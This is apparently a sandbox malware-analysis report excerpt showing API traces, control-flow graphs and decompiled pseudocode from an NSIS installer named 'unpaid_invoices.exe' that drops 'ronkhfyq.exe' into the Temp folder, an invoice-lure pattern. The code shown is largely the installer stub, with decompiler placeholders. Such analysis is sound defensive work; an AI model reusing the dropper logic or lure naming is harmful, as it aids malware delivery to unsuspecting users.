              • GetUserDefaultUILanguage.KERNELBASE(00000002,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403D37
                • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
              • lstrcatW.KERNEL32(1033,007A1F88), ref: 00403D9E
              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,?,?,?,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000,00000002,76CDFAA0), ref: 00403E1E
              • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,?,?,?,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000), ref: 00403E31
              • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,?,00000000,?), ref: 00403E3C
              • LoadImageW.USER32 ref: 00403E85
              • RegisterClassW.USER32 ref: 00403EC2
              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403EDA
              • CreateWindowExW.USER32 ref: 00403F0F
              • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F45
              • GetClassInfoW.USER32 ref: 00403F71
              • GetClassInfoW.USER32 ref: 00403F7E
              • RegisterClassW.USER32 ref: 00403F87
              • DialogBoxParamW.USER32 ref: 00403FA6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
              • String ID: .DEFAULT\Control Panel\International$.exe$1033$@zz$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
              • API String ID: 606308-2796827352
              • Opcode ID: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
              • Instruction ID: b3798c48b8e7ed104fde3a001c8dc5b3ad58c50dca8dc7adab70101e5acdd628
              • Opcode Fuzzy Hash: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
              • Instruction Fuzzy Hash: 6561C170640200BED620AF669D46F2B3A6CEBC5B45F40853FF941B62E2DB7D8901CB6D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 202memoryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 321 4030d0-40311e GetTickCount GetModuleFileNameW call 40615e 324 403120-403125 321->324 325 40312a-403158 call 40666e call 405f89 call 40666e GetFileSize 321->325 326 403370-403374 324->326 333 403246-403254 call 40302e 325->333 334 40315e-403175 325->334 340 403328-40332d 333->340 341 40325a-40325d 333->341 336 403177 334->336 337 403179-403186 call 4035e8 334->337 336->337 345 4032e4-4032ec call 40302e 337->345 346 40318c-403192 337->346 340->326 343 403289-4032d8 GlobalAlloc call 40618d CreateFileW 341->343 344 40325f-403277 call 4035fe call 4035e8 341->344 362 4032da-4032df 343->362 363 4032ee-40331e call 4035fe call 403377 343->363 344->340 373 40327d-403283 344->373 345->340 350 403212-403216 346->350 351 403194-4031ac call 406119 346->351 354 403218-40321e call 40302e 350->354 355 40321f-403225 350->355 351->355 365 4031ae-4031b5 351->365 354->355 360 403227-403235 call 406b28 355->360 361 403238-403240 355->361 360->361 361->333 361->334 362->326 377 403323-403326 363->377 365->355 371 4031b7-4031be 365->371 371->355 374 4031c0-4031c7 371->374 373->340 373->343 374->355 376 4031c9-4031d0 374->376 376->355 378 4031d2-4031f2 376->378 377->340 379 40332f-403340 377->379 378->340 380 4031f8-4031fc 378->380 381 403342 379->381 382 403348-40334d 379->382 383 403204-40320c 380->383 384 4031fe-403202 380->384 381->382 385 40334e-403354 382->385 383->355 386 40320e-403210 383->386 384->333 384->383 385->385 387 403356-40336e call 406119 385->387 386->355 387->326
              C-Code - Quality: 97%
              			E004030D0(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t61;
				intOrPtr _t64;
				void* _t67;
				intOrPtr* _t69;
				long _t81;
				signed int _t88;
				intOrPtr _t91;
				void* _t94;
				void* _t99;
				void* _t103;
				long _t104;
				long _t107;
				void* _t108;

				_v8 = 0;
				_v12 = 0;
				 *0x7a8aac = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe", 0x400);
				_t103 = E0040615E(L"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe", 0x80000000, 3);
				 *0x40a018 = _t103;
				if(_t103 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040666E(L"C:\\Users\\jones\\Desktop", L"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe");
				E0040666E(0x7b7000, E00405F89(L"C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t103, 0);
				 *0x79f740 = _t54;
				_t107 = _t54;
				if(_t54 <= 0) {
					L22:
					E0040302E(1);
					_pop(_t94);
					if( *0x7a8ab4 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t108 = _t57;
						 *0x40ce78 = 0xb;
						 *0x40ce90 = 0; // executed
						E0040618D(_t94,  &_v560, L"C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t61 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x40a01c = _t61;
						if(_t61 != 0xffffffff) {
							_t64 = E004035FE( *0x7a8ab4 + 0x1c);
							 *0x79f744 = _t64;
							 *0x79f738 = _t64 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t67 = E00403377(_v16, 0xffffffff, 0, _t108, _v20); // executed
							if(_t67 == _v20) {
								 *0x7a8ab0 = _t108;
								 *0x7a8ab8 =  *_t108;
								if((_v40 & 0x00000001) != 0) {
									 *0x7a8abc =  *0x7a8abc + 1;
								}
								_t45 = _t108 + 0x44; // 0x44
								_t69 = _t45;
								_t99 = 8;
								do {
									_t69 = _t69 - 8;
									 *_t69 =  *_t69 + _t108;
									_t99 = _t99 - 1;
								} while (_t99 != 0);
								 *((intOrPtr*)(_t108 + 0x3c)) =  *0x79f734;
								E00406119(0x7a8ac0, _t108 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035FE( *0x79f730);
					if(E004035E8( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t104 = _t107;
						asm("sbb eax, eax");
						_t81 = ( ~( *0x7a8ab4) & 0x00007e00) + 0x200;
						if(_t107 >= _t81) {
							_t104 = _t81;
						}
						if(E004035E8(0x797730, _t104) == 0) {
							E0040302E(1);
							L30:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x7a8ab4 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L19;
						}
						E00406119( &_v40, 0x797730, 0x1c);
						_t88 = _v40;
						if((_t88 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t88;
							 *0x7a8b40 =  *0x7a8b40 | _a4 & 0x00000002;
							_t91 = _v16;
							 *0x7a8ab4 =  *0x79f730;
							if(_t91 > _t107) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t107 = _t91 - 4;
								if(_t104 > _t107) {
									_t104 = _t107;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t107 <  *0x79f740) {
							_v8 = E00406B28(_v8, 0x797730, _t104);
						}
						 *0x79f730 =  *0x79f730 + _t104;
						_t107 = _t107 - _t104;
					} while (_t107 != 0);
					goto L22;
				}
			}




























              0x004030de
              0x004030e1
              0x004030fb
              0x00403100
              0x00403113
              0x00403118
              0x0040311e
              0x00000000
              0x00403120
              0x00403131
              0x00403142
              0x00403149
              0x00403151
              0x00403156
              0x00403158
              0x00403246
              0x00403248
              0x00403253
              0x00403254
              0x00000000
              0x00000000
              0x0040325d
              0x00403289
              0x0040328e
              0x00403294
              0x004032a2
              0x004032a9
              0x004032af
              0x004032ca
              0x004032d3
              0x004032d8
              0x004032f7
              0x00403307
              0x00403319
              0x0040331e
              0x00403326
              0x00403333
              0x0040333b
              0x00403340
              0x00403342
              0x00403342
              0x0040334a
              0x0040334a
              0x0040334d
              0x0040334e
              0x0040334e
              0x00403351
              0x00403353
              0x00403353
              0x0040335d
              0x00403369
              0x00000000
              0x0040336e
              0x00000000
              0x00403326
              0x00000000
              0x004032da
              0x00403265
              0x00403277
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040315e
              0x0040315e
              0x00403163
              0x00403167
              0x0040316e
              0x00403175
              0x00403177
              0x00403177
              0x00403186
              0x004032e6
              0x00403328
              0x00000000
              0x00403328
              0x00403192
              0x00403216
              0x00403219
              0x0040321e
              0x00000000
              0x00403216
              0x0040319f
              0x004031a4
              0x004031ac
              0x004031d2
              0x004031e1
              0x004031e7
              0x004031ec
              0x004031f2
              0x00000000
              0x00000000
              0x004031fc
              0x00403204
              0x00403207
              0x0040320c
              0x0040320e
              0x0040320e
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004031fc
              0x0040321f
              0x00403225
              0x00403235
              0x00403235
              0x00403238
              0x0040323e
              0x0040323e
              0x00000000
              0x0040315e

              APIs
              • GetTickCount.KERNEL32 ref: 004030E4
              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\unpaid_invoices.exe,00000400), ref: 00403100
                • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\unpaid_invoices.exe,80000000,00000003), ref: 00406162
                • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
              • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\unpaid_invoices.exe,C:\Users\user\Desktop\unpaid_invoices.exe,80000000,00000003), ref: 00403149
              • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\unpaid_invoices.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
              • API String ID: 2803837635-353167155
              • Opcode ID: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
              • Instruction ID: 583a998f33a1e047253031f1d22d0aa602d55a867c39f8e0fceec447792fd132
              • Opcode Fuzzy Hash: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
              • Instruction Fuzzy Hash: 0671E171940204ABCB20DFA5EE85A9E3FA8AB11316F10817FF900B62D1DB7C9E418B5D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 454 40176f-401794 call 402da6 call 405fb4 459 401796-40179c call 40666e 454->459 460 40179e-4017b0 call 40666e call 405f3d lstrcatW 454->460 466 4017b5-4017b6 call 4068f5 459->466 460->466 469 4017bb-4017bf 466->469 470 4017c1-4017cb call 4069a4 469->470 471 4017f2-4017f5 469->471 478 4017dd-4017ef 470->478 479 4017cd-4017db CompareFileTime 470->479 473 4017f7-4017f8 call 406139 471->473 474 4017fd-401819 call 40615e 471->474 473->474 481 40181b-40181e 474->481 482 40188d-4018b6 call 4056d0 call 403377 474->482 478->471 479->478 483 401820-40185e call 40666e * 2 call 4066ab call 40666e call 405cce 481->483 484 40186f-401879 call 4056d0 481->484 496 4018b8-4018bc 482->496 497 4018be-4018ca SetFileTime 482->497 483->469 517 401864-401865 483->517 494 401882-401888 484->494 498 402c33 494->498 496->497 500 4018d0-4018db FindCloseChangeNotification 496->500 497->500 502 402c35-402c39 498->502 503 4018e1-4018e4 500->503 504 402c2a-402c2d 500->504 506 4018e6-4018f7 call 4066ab lstrcatW 503->506 507 4018f9-4018fc call 4066ab 503->507 504->498 511 401901-4023a2 call 405cce 506->511 507->511 511->502 511->504 517->494 519 401867-401868 517->519 519->484
              C-Code - Quality: 77%
              			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FB4( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"C:\\U";
				if(_t35 == 0) {
					lstrcatW(E00405F3D(E0040666E(_t81, L"C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					E0040666E();
				}
				E004068F5(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E004069A4(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406139(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040615E(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056D0(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x7a8b28;
						goto L32;
					} else {
						E0040666E(0x40b5f8, _t83);
						E0040666E(_t83, _t81);
						E004066AB(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040666E(_t83, 0x40b5f8);
						_t64 = E00405CCE("C:\Users\jones\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x7a8b28 =  &( *0x7a8b28->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056D0();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056D0(0xffffffea,  *(_t86 - 8));
				 *0x7a8b54 =  *0x7a8b54 + 1;
				_t45 = E00403377(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x7a8b54 =  *0x7a8b54 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066AB(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066AB(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CCE();
					goto L29;
				}
				goto L33;
			}


















              0x0040176f
              0x00401776
              0x00401782
              0x00401785
              0x0040178a
              0x0040178d
              0x00401794
              0x004017b0
              0x00401796
              0x00401797
              0x00401797
              0x004017b6
              0x004017bb
              0x004017bb
              0x004017bf
              0x004017c2
              0x004017c7
              0x004017c9
              0x004017cb
              0x004017d0
              0x004017d0
              0x004017db
              0x004017db
              0x004017ec
              0x004017ee
              0x004017ee
              0x004017ef
              0x004017ef
              0x004017f2
              0x004017f5
              0x004017f8
              0x004017f8
              0x004017ff
              0x0040180e
              0x00401813
              0x00401816
              0x00401819
              0x00000000
              0x00000000
              0x0040181b
              0x0040181e
              0x00401874
              0x00401879
              0x004015b6
              0x0040292e
              0x0040292e
              0x00402c2a
              0x00402c2d
              0x00402c2d
              0x00000000
              0x00401820
              0x00401826
              0x0040182d
              0x0040183a
              0x00401845
              0x0040185b
              0x0040185b
              0x0040185e
              0x00000000
              0x00401864
              0x00401864
              0x00401865
              0x00401882
              0x00402c33
              0x00402c33
              0x00402c33
              0x00401867
              0x00401867
              0x00401868
              0x00401493
              0x0040239d
              0x0040239d
              0x0040239d
              0x00401865
              0x0040185e
              0x00402c35
              0x00402c39
              0x00402c39
              0x00401892
              0x00401897
              0x004018a5
              0x004018aa
              0x004018b0
              0x004018b4
              0x004018b6
              0x004018be
              0x004018ca
              0x004018b8
              0x004018b8
              0x004018bc
              0x00000000
              0x00000000
              0x004018bc
              0x004018d3
              0x004018d9
              0x004018db
              0x00000000
              0x004018e1
              0x004018e1
              0x004018e4
              0x004018fc
              0x004018e6
              0x004018e9
              0x004018f2
              0x004018f2
              0x00401901
              0x00401906
              0x00402398
              0x00000000
              0x00402398
              0x00000000

              APIs
              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
              • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,00000000,00000000,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
              • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq
              • API String ID: 1941528284-2522903133
              • Opcode ID: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
              • Instruction ID: c895feda3e823d9c0bc0fb7144dfd3dc41df657037fc16576ccee127d24ab7e8
              • Opcode Fuzzy Hash: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
              • Instruction Fuzzy Hash: CB41D571800108BACF11BBB5DD85DAE7679EF45328F20463FF422B11E1DB3D89619A2E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040347F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 520 40347f-4034a7 GetTickCount 521 4035d7-4035df call 40302e 520->521 522 4034ad-4034d8 call 4035fe SetFilePointer 520->522 527 4035e1-4035e5 521->527 528 4034dd-4034ef 522->528 529 4034f1 528->529 530 4034f3-403501 call 4035e8 528->530 529->530 533 403507-403513 530->533 534 4035c9-4035cc 530->534 535 403519-40351f 533->535 534->527 536 403521-403527 535->536 537 40354a-403566 call 406b96 535->537 536->537 538 403529-403549 call 40302e 536->538 543 4035d2 537->543 544 403568-403570 537->544 538->537 545 4035d4-4035d5 543->545 546 403572-40357a call 406210 544->546 547 403593-403599 544->547 545->527 551 40357f-403581 546->551 547->543 548 40359b-40359d 547->548 548->543 550 40359f-4035b2 548->550 550->528 552 4035b8-4035c7 SetFilePointer 550->552 553 403583-40358f 551->553 554 4035ce-4035d0 551->554 552->521 553->535 555 403591 553->555 554->545 555->550
              C-Code - Quality: 93%
              			E0040347F(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t48;

				_t33 =  *0x79f734 -  *0x40ce60 + _a4;
				 *0x7a8aac = GetTickCount() + 0x1f4;
				if(_t33 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035FE( *0x79f744);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x79f740 = _t33;
				 *0x79f730 = 0;
				while(1) {
					_t30 = 0x4000;
					_t11 =  *0x79f738 -  *0x79f744;
					if(_t11 <= 0x4000) {
						_t30 = _t11;
					}
					_t12 = E004035E8(0x793730, _t30);
					if(_t12 == 0) {
						break;
					}
					 *0x79f744 =  *0x79f744 + _t30;
					 *0x40ce68 = 0x793730;
					 *0x40ce6c = _t30;
					L6:
					L6:
					if( *0x7a8ab0 != 0 &&  *0x7a8b40 == 0) {
						 *0x79f730 =  *0x79f740 -  *0x79f734 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce70 = 0x78b730;
					 *0x40ce74 = 0x8000;
					if(E00406B96(?str?) < 0) {
						goto L20;
					}
					_t35 =  *0x40ce70; // 0x78e665
					_t36 = _t35 - 0x78b730;
					if(_t36 == 0) {
						__eflags =  *0x40ce6c; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t30;
						if(_t30 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x79f734;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00406210( *0x40a01c, 0x78b730, _t36); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t36;
